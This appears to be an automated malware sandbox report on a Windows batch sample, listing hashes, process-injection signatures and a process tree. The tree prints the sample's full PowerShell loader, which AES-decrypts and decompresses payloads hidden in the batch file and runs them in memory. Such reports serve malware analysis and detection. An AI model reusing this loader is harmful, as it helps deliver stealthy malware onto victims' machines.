Analysis
-
max time kernel
0s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
01-07-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd
Resource
win7-20240419-en
1 signatures
150 seconds
General
-
Target
0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd
-
Size
500KB
-
MD5
6e45850d43bde1d6bc68ab6b07daf153
-
SHA1
427ed64bb89e6bf40e59276768d37152c209e976
-
SHA256
0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150
-
SHA512
e44ea25026d2146991e61eb82ed6028af248fb9235b271f665943b432833e3274a3e9ae9ffc912436b294e6a450337cbd251daafad11c926a41cc942042b4f81
-
SSDEEP
12288:Co8xbtgA4f9Ek3aoC4QvfD2ZK1n6B4XyZYi9lGUnnQ:Co8NtsaCm1nhqD9ginQ
Score
1/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
cmd.exedescription pid process target process PID 1700 wrote to memory of 108 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 108 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 108 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 1336 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 1336 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 1336 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2944 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2944 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2944 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 1812 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 1812 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 1812 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2120 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2120 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2120 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2728 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2728 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2728 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2280 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2280 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2280 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2332 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2332 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2332 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2404 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2404 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2404 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2156 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2156 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2156 1700 cmd.exe cmd.exe PID 1700 wrote to memory of 2648 1700 cmd.exe powershell.exe PID 1700 wrote to memory of 2648 1700 cmd.exe powershell.exe PID 1700 wrote to memory of 2648 1700 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wNcFKur0Jl7450HdnpBnzjJ0VkczGUUgZCayB4N/z5k='); $aes_var.IV=[System.Convert]::FromBase64String('LnVH8Q3dknv++SzltewTug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZpTQS=New-Object System.IO.MemoryStream(,$param_var); $OYGBL=New-Object System.IO.MemoryStream; $STZRP=New-Object System.IO.Compression.GZipStream($ZpTQS, [IO.Compression.CompressionMode]::Decompress); $STZRP.CopyTo($OYGBL); $STZRP.Dispose(); $ZpTQS.Dispose(); $OYGBL.Dispose(); $OYGBL.ToArray();}function execute_function($param_var,$param2_var){ $QnAOk=[System.Reflection.Assembly]::Load([byte[]]$param_var); $GDXEp=$QnAOk.EntryPoint; $GDXEp.Invoke($null, $param2_var);}$pPyzM = 'C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd';$host.UI.RawUI.WindowTitle = $pPyzM;$CtNBM=[System.IO.File]::ReadAllText($pPyzM).Split([Environment]::NewLine);foreach ($oZZUg in $CtNBM) { if ($oZZUg.StartsWith('IrzEsjacAQqOMrEShQQm')) { $GKlON=$oZZUg.Substring(20); break; }}$payloads_var=[string[]]$GKlON.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2648-4-0x00000000022A0000-0x0000000002320000-memory.dmpFilesize
512KB
-
memory/2648-5-0x000000001B540000-0x000000001B822000-memory.dmpFilesize
2.9MB
-
memory/2648-6-0x0000000002240000-0x0000000002248000-memory.dmpFilesize
32KB
-
memory/2648-7-0x00000000022A0000-0x0000000002320000-memory.dmpFilesize
512KB